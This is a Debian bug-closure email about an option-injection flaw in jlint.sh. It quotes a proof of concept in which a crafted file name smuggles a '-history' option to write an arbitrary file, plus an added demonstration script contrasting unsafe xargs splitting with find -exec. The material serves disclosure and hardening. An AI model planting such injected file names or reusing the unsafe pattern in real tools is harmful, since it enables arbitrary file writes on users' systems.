Your message dated Mon, 24 Apr 2023 10:55:01 +0200
with message-id <[email protected]>
and subject line jlint has been removed from Debian
has caused the Debian Bug report #895606,
regarding jlint.sh: option injection
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
895606: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895606
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: jlint
Version: 3.0-4.5
Tags: security
Control: affects -1 check-all-the-things

The jlint.sh script is vulnerable to option injection. Running the script in a directory that contains untrusted files could trick it into writing to an arbitrary file.

Proof of concept:

  $ f=' -history /tmp/moo .class'; mkdir -p "${f%/*}"; touch "$f"
  $ ls -d /tmp/moo
  ls: cannot access /tmp/moo: No such file or directory
  $ jlint.sh
  Failed to read file '.// -history /tmp/moo .class'
  Failed to open file '.class'
  Verification completed: 0 reported messages.
  $ ls -d /tmp/moo
  /tmp/moo

--
Jakub Wilk

--- End Message ---
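Added example, not part of the original report and not jlint.sh's own code: it recreates the file name from the proof of concept in a scratch directory and shows how it reaches a tool when the file list is split on whitespace, compared with one argument per file. It assumes the wrapper hands find output to the tool through a whitespace-splitting step such as plain xargs; the stub tool and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed demonstration. The "tool" is a stub that prints every argument
# it receives in brackets, so argument boundaries are visible.
STUB='for a in "$@"; do printf "[%s]\n" "$a"; done'

# Create the file name from the report inside a fresh temporary directory.
# The path is relative, so nothing outside that directory is touched.
make_tree() {
    d=$(mktemp -d) || return 1
    f=' -history /tmp/moo .class'
    (cd "$d" && mkdir -p "${f%/*}" && touch "$f") || return 1
    printf '%s\n' "$d"
}

# Assumed wrapper pattern: xargs splits its input on blanks, so a single
# file name turns into several arguments, one of which looks like an option.
unsafe_args() {
    (cd "$1" && find . -name '*.class' | xargs sh -c "$STUB" sh)
}

# Hardened pattern: find passes each path as exactly one argument. Paths
# rooted at "." start with "./", so they cannot begin with a dash either.
safe_args() {
    (cd "$1" && find . -name '*.class' -exec sh -c "$STUB" sh {} +)
}

d=$(make_tree) || exit 1
echo "split on whitespace:"
unsafe_args "$d"
echo "one argument per file:"
safe_args "$d"
rm -rf "$d"
```

Where the file list has to go through a pipe, `find -print0` with `xargs -0` keeps the same one-argument-per-file property on systems that provide those options.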
--- Begin Message ---
Version: 3.0-4.5+rm

jlint was last released with Debian 8 (jessie)
in April 2015 and has been removed from the Debian archive afterwards.
See https://bugs.debian.org/811366 for details on the removal.
Regular security support for jessie ended in June 2018 and LTS support
ended in June 2020. I'm closing the remaining bug reports now.

Andreas

--- End Message ---
